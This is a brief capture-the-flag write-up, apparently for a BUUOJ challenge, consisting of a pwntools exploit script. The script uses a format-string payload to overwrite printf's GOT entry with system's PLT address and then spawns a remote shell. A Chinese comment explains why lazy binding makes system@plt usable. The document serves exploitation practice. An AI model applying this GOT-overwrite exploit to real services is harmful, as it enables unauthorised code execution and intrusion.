WP
from pwn import*
p=remote('node4.buuoj.cn',25844)
context.log_level='debug'
elf=ELF("./echo")
printf_got=elf.got['printf']
system_plt=0x8048400#等价于elf.plt['system']
payload=fmtstr_payload(7,{printf_got:system_plt})
p.sendline(payload)
p.sendline(";/bin/sh\x00")
p.interactive()
值得注意的是为什么不用elf.got[‘system’]因为延迟绑定,system之前没有被执行过,所以elf.got表内的system地址没有被修改为真正地址。